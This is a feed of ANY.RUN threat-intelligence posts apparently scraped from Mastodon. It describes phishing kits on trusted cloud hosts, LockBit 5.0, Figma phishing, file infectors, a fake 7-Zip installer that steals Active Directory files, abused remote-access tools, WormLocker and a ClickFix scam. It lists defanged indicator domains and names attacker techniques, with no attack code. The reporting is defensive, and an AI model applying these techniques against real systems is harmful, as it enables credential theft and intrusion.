Lmst
Login

#ExploreWithANYRUN

ANY.RUNanyrun_app@infosec.exchange
2026-01-15

🚨 #Phishing on Trusted Cloud Infrastructure: Google, Microsoft, Cloudflare.
We’re tracking a growing trend where phishing kit infrastructure is hosted on legitimate cloud and CDN platforms, not newly registered domains. In some cases, these campaigns specifically target enterprise users. This creates serious visibility challenges for security teams.

We’ve observed this pattern across multiple #phishkits:
πŸ”Ή #Tycoon hosted on alencure[.]blob[.]core[.]windows[.]net (Microsoft Azure Blob Storage): app.any.run/tasks/29b53d89-99b
⚠️ #Sneaky2FA hosted on legitimate cloud platforms, filtering out free email domains via a fake Microsoft 365 login to target corporate accounts:
firebasestorage[.]googleapis[.]com (Cloud Storage for Firebase): app.any.run/tasks/8189dd5e-015
cloudfront[.]net (AWS CloudFront): app.any.run/tasks/9a2d1537-e95
πŸ”Ή #EvilProxy hosted on sites[.]google[.]com (Google Sites): app.any.run/tasks/07995c22-6e7

Victims see a β€œtrusted” provider domain, while the network only sees normal HTML being loaded from cloud infrastructure. What looks clean at first glance is exposed by #ANYRUN Sandbox in under 60 seconds, directly reducing MTTD and MTTR.

πŸ” Hunt for related activity and pivot from #IOCs using these search queries in TI Lookup:
πŸ”Ή Microsoft Azure Blob Storage abuse: intelligence.any.run/analysis/
πŸ”Ή Firebase Cloud Storage abuse: intelligence.any.run/analysis/
πŸ”Ή Google Sites abuse: intelligence.any.run/analysis/

Many security vendors will flag these domains as legitimate. Technically, they are. That’s why security teams need behavioral analysis and network-level signals to reliably uncover phishing before impact.

πŸš€ Speed up detection and gain full visibility into complex threats with #ANYRUN. Sign up: app.any.run/?utm_source=mastod
#ExploreWithANYRUN

#IOCs:
mphdvh[.]icu
kamitore[.]com
aircosspascual[.]com
Lustefea[.]my[.]id

#cybersecurity #infosec

ANY.RUNanyrun_app@infosec.exchange
2025-10-02

🚨 New #LockBit Variant Tagets ESXi and Linux: Critical Infrastructure at Risk.
⚠️ In September 2025, on its sixth anniversary, the LockBit group released LockBit 5.0, a new version of its #ransomware. The new variant introduces stronger obfuscation, flexible configurations, and advanced anti-analysis techniques.

The most alarming development is the expansion to #Linux and #VMware ESXi, signaling a clear focus on server environments and critical infrastructure. Ransomware has shifted from targeting endpoints to directly disrupting core infrastructure.

❗️ A single intrusion can take down dozens of virtual servers, causing organization-wide outages with severe financial and reputational impact.

LockBit 5.0 comes in three builds, each optimized for its target OS with nearly identical functionality.

🚨 VMware ESXi: The most critical new variant, a dedicated encryptor for hypervisors that can simultaneously disable all VMs on a host. Its CLI resembles the other builds but adds VM datastore and config targeting.
See live execution: app.any.run/tasks/c3591887-eb3

πŸ“Œ Windows: Main variant. Runs with DLL reflection, supports both GUI and console, encrypts local and network files, removes VSS shadow copies, stops services, clears event logs, and drops ransom notes linking to live chat support.
See live execution: app.any.run/tasks/17cc701e-746

πŸ“Œ Linux: Console-based, replicates Windows functionality with mount point filters, post-encryption disk wiping, and anti-analysis checks such as geolocation restrictions and build expiry.
See live execution: app.any.run/tasks/d22b7747-1ef

πŸ” Use these TI Lookup search queries to monitor for suspicious activity and enrich detection logic with live threat data:
ESXi Lockbit 5.0: intelligence.any.run/analysis/
Linux Lockbit 5.0: intelligence.any.run/analysis/
Windows Lockbit 5.0: intelligence.any.run/analysis/

πŸ‘¨β€πŸ’» What can you do now?
βœ… Boost visibility: combine EDR/XDR with behavior-based monitoring. Leverage #ANYRUN’s Sandbox and TI Lookup to detect new builds early, enrich detection rules, and reduce MTTR by up to 21 minutes.
βœ… Harden access: enforce MFA for vCenter, restrict direct internet access to ESXi hosts, and route connections through VPN.
βœ… Ensure resilience: keep offline backups and test recovery regularly.

πŸ‘ Thanks to
@fbgwls245
for sharing the Linux sample with the community!

πŸš€ Strengthen resilience, protect business continuity through proactive security with #ANYRUN. #ExploreWithANYRUN #CybersecurityAwarenessMonth

ANY.RUNanyrun_app@infosec.exchange
2025-09-24

🚨 Figma Abuse Leads to Microsoft-Themed #Phishing.
⚠️ Attackers are exploiting trusted platforms to bypass defenses. Among all phishing threats we tracked last month, #phishkits abusing Figma made up a significant share: #Storm1747 (49%), Mamba (25%), Gabagool (2%), and Other (24%).

πŸ” This trend underscores the need to monitor abuse of trusted platforms that create blind spots in defenses and raise the risk of large-scale credential theft.

In this case, Figma prototypes were abused as phishing lures: a victim receives an email with a link to a β€œdocument” hosted on figma.com. Once opened, the prototype displays content that prompts a click on an embedded link. The chain continues through fake CAPTCHAs or even a legitimate Cloudflare Turnstile widget.

πŸ”— Execution chain:
Phishing email with a link ➑️ Figma document ➑️ Fake CAPTCHA or Cloudflare Turnstile widget ➑️ Phishing Microsoft login page

πŸ‘¨β€πŸ’» See the full execution on a live system and download actionable report: app.any.run/tasks/5652b435-233

πŸ“Œ Why Figma? Public prototypes are easy to create and share, require no authentication, and come from a trusted domain. This combination makes it easier to bypass automated security controls, slip through email filters, and increase user interaction.

🎯 For CISOs, the abuse of widely trusted platforms creates critical monitoring gaps, while Microsoft impersonation elevates the risk of credential theft or account takeover, posing direct risks to business resilience and compliance.

SOC teams need the ability to trace redirect chains, uncover hidden payloads, and enrich detection rules with both static #IOCs and behavioral context.

πŸ” Use this TI Lookup search query to expand threat visibility and enrich #IOCs with actionable threat context:
intelligence.any.run/analysis/

IOCs:
9a4c7dcf25e9590654694063bc4958d58bcbe57e5e95d9469189db6873c4bb2c
Dataartnepal[.]com

Strengthen resilience and protect business continuity with #ANYRUN πŸš€ #ExploreWithANYRUN

#cybersecurity #infosec

ANY.RUNanyrun_app@infosec.exchange
2025-09-10

🚨 Fileinfectors Evolved: Spreading Ransomware Across Enterprise Networks

⚠️ Fileinfector #malware inserts its code into files. These threats once spread mainly through external drives and local systems. Today’s file infectors are mostly hybrid variants, frequently combined with #ransomware.

These variants encrypt data and inject malicious code into files, enabling further spread when infected files are executed.

❗️ They are especially dangerous in corporate environments with shared folders, where a single infected file can rapidly spread across the network and cause widespread damage.
Such outbreaks overwhelm security teams, complicate incident response, and disrupt business continuity.

πŸ‘¨β€πŸ’» An optimized SOC that relies on early detection, behavioral analysis, and proactive hunting is critical to limiting impact. Let’s see malware execution on a live system:
app.any.run/tasks/7ea8ab1f-3c9

In this case, the malware is interacting with multiple files and modifying their content. The infected files became executables, with PE headers confirming injected malicious code.

The analysis revealed hybrid behavior: a fileinfector acting like ransomware, enabling further spread on execution.

πŸ” Use this TI Lookup search query to explore fileinfector activity and enrich #IOCs with actionable threat context:
intelligence.any.run/analysis/

πŸ‘Ύ Gather malware hashes and infected files to power proactive hunting:
intelligence.any.run/analysis/

Hybrid fileinfectors pose a significant threat to enterprise networks. Leveraging #ANYRUN Sandbox and TI Lookup reduces MTTR by up to 21 minutes per case and gives access to 24x more IOCs from millions of past analyses.

Strengthen resilience and protect critical assets through proactive security with #ANYRUN πŸš€ #ExploreWithANYRUN

#cybersecurity #infosec

ANY.RUNanyrun_app@infosec.exchange
2025-07-09

🚨 Fake 7-Zip installer exfiltrates Active Directory files.
A #malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server.
πŸ₯· Upon execution, the #malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations.

🎯 It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys.

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces.

πŸ‘¨β€πŸ’» #ANYRUN Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session.
πŸ” See analysis session: app.any.run/tasks/7f03cd5b-ad0

This technique grants the attacker full access to ntds.dit dump, allowing them to extract credentials for Active Directory objects and enables lateral movement techniques such as Pass-the-Hash or Golden Ticket.

πŸš€ Analyze and investigate the latest malware and #phishing threats with #ANYRUN.
#ExploreWithANYRUN

ANY.RUNanyrun_app@infosec.exchange
2025-07-02

🚨 Top 5 Remote Access Tools Exploited by Threat Actors in the First Half of 2025.
⚠️ While legitimate and widely used by IT teams, Remote Monitoring and Management tools are increasingly used by threat actors to establish persistence, bypass defenses, and exfiltrate data.

In the first half of 2025, #ANYRUN observed a significant number of #malware samples leveraging known RMM software for #malicious access. Here are the 5 most frequently abused tools, along with analysis examples:
1️⃣ ScreenConnect – 3,829 sandbox sessions
app.any.run/tasks/3aa42d2e-8b9

2️⃣ UltraVNC – 2,117 sandbox sessions
app.any.run/tasks/1b7234a0-ab1

3️⃣ NetSupport – 746 sandbox sessions
app.any.run/tasks/6740b646-276

4️⃣ PDQ Connect – 230 sandbox sessions
app.any.run/tasks/05948d1c-312

5️⃣ Atera – 171 sandbox sessions
app.any.run/tasks/61e01084-e44

πŸ‘¨β€πŸ’» To support faster detection and investigation, we’ve added the rmm-tool tag in TI Lookup, making it easier for threat hunters and incident responders to track RMM-based intrusions.

πŸ” Explore recent RMM abuse cases in the last 180 days:
intelligence.any.run/analysis/

Analyze latest malware and #phishing threats with #ANYRUN πŸš€ #ExploreWithANYRUN

ANY.RUNanyrun_app@infosec.exchange
2025-04-17

🚨 #WormLocker Returns with New Builds. First detected in 2021, this #ransomware remains active, with new samples recently identified.
πŸ‘¨β€πŸ’» With #ANYRUN Sandbox, analysts can trace the full execution chain and uncover #malware behavior without the need for reverse engineering or manual debugging. Let’s see it in action.

πŸ“₯ Upon execution, WormLocker 2.0 creates worm_tool.sys files in both the Desktop and Downloads folders.

It uses the β€˜takeown’ and β€˜icacls’ commands to take ownership of system files and modifies their access control lists. Malware then unpacks its resources into the System32 folder.

🚫 To disrupt system recovery, it disables Task Manager, deletes hidden files, and terminates the Explorer process. The Shell settings are set to empty, keeping the Explorer disabled even after reboot.

WormLocker 2.0 employs #AES-256 in CBC mode with a fixed salt. The key is generated from the hardcoded static password β€˜LUC QPV BTR’ by applying SHA-256.

πŸ”‘ Entering this key restores system settings and decrypts the affected data.

Finally, the ransomware runs a VBS script to play audio containing its ransom demand.

πŸ‘¨β€πŸ’» Analysis session: app.any.run/tasks/5a6eb571-5fb
With β€˜LUC QPV BTR’ password entered: app.any.run/tasks/5bb3af51-5d6

Improve your SOC operations with #ANYRUN πŸš€
#ExploreWithANYRUN

ANY.RUNanyrun_app@infosec.exchange
2025-04-17

🚨 New #ClickFix scam targets US users with fake MS Defender and CloudFlare pages.
⚠️ The scam page is hosted on a domain registered back in 2006, pretending to be the Indo-American Chamber of Commerce.
🎯 The #phishing page loads only for US-based victims, as observed during analysis with a residential IP in #ANYRUN Sandbox.

πŸ‘¨β€πŸ’» Analysis session: app.any.run/browses/50395c46-4

πŸ“ URL: iaccindia[.]com
The page hijacks the full-screen mode and displays a fake β€œWindows Defender Security Center” popup.

🎭 It mimics the Windows UI, locks the screen, and displays urgent messages to panic the user.

Victims are prompted to call a fake tech support number (+1-…), setting the stage for further exploitation.

🎣 The phishing page may also display a fake CloudFlare message tricking users to execute a #malicious Run command.
Take a look: app.any.run/tasks/e83a5861-600

#IOCs:
supermedicalhospital[.]com
adflowtube[.]com
knowhouze[.]com
ecomicrolab[.]com
javascripterhub[.]com
virtual[.]urban-orthodontics[.]com

Streamline threat analysis for your SOC with #ANYRUN πŸš€
#ExploreWithANYRUN

Screenshot of a phishing page analyzed in ANY.RUN SandboxScreenshot of a phishing page analyzed in ANY.RUN SandboxScreenshot of a phishing page analyzed in ANY.RUN SandboxScreenshot of a phishing page analyzed in ANY.RUN Sandbox

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst